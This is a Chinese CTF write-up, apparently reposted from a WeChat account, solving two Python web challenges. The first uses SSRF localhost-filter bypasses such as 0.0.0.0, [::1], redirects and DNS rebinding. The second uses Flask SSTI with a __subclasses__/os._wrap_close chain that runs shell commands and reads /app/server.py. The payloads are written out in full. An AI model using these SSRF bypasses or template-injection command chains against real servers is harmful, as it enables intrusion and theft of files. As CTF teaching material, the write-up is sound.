1.Python里的SSRF
题目提示
尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag
访问url:
http://f5704bb3-5869-4ecb-9bdc-58b022589224.node3.buuoj.cn/
回显如下:
通过提示构造payload:
?url=http://127.0.0.1:8000/api/internal/secret
进行访问
回显提示127.0.0.1是禁止的因为127.0.0.1是本地的地址,提示是说访问容器内部的地址
所以我们可以用0.0.0.0代替127.0.0.1
重新构造payload:
?url=http://0.0.0.0:8000/api/internal/secret
成功得到flag
其他不同的方式,得多尝试一下,
官方wp
本题有多重解法
- `0.0.0.0:8000` 绕过
- `[::1]:8000` 绕过(需要支持 ipv6)
- 重定向跳转到 `127.0.0.1:8000`
- dns rebinding 输入一个域名,第一次解析到非 `127.0.0.1` 地址上,第二个解析到 `127.0.0.1` 上。
2.python模板注入(SSTI)
访问url,页面回显 password is wrong,但是没有输入密码的地方
所以从 url 提交
?password={{3*3}}
发现可以识别并且正确回显
据回显的结果可以判断这是一个flask模板注入
通过以下语句
/?password={{"".__class__.__bases__[0].__subclasses__()}}
拿到可用的类的列表
我们需要的是os命令执行类<class 'os._wrap_close'>
我们要判断他所属的位置,这样才能进行索引,将全部类复制放到pycharm(与他有同样功能的工具也行),我们索引逗号的位置,我们索引到我们需要类的位置,再在索引他前面逗号的位置,我这里索引的结果是127,如果不对上下浮动几位看一下,大概就这个位置,我这127是正确的,
我们可以先看一下我们索引的是否正确,输入url
/?password={{"".__class__.__bases__[0].__subclasses__()[127]}}
我这里索引的结果是127,如果不对上下浮动几位看一下,大概就这个位置,我这127是正确的,所以索引结果就是<class 'os._wrap_close'>
构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令)
/?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}
文件夹如下
最引起我们注意的就是app这个文件夹
经过一些尝试(目录遍历什么的),我们得知flag就在/app/server.py中,我们直接用cat查看文件内容就行
/?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat /app/server.py').read()}}
成功获取flag
攻防交流群
声明
免责声明:该文章内容仅用于学习交流自查使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息、技术或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关,公众号儒道易行及作者不为此承担任何责任。
转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
原文始发于微信公众号(儒道易行):【CTFer成长之路】Python中的安全问题
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论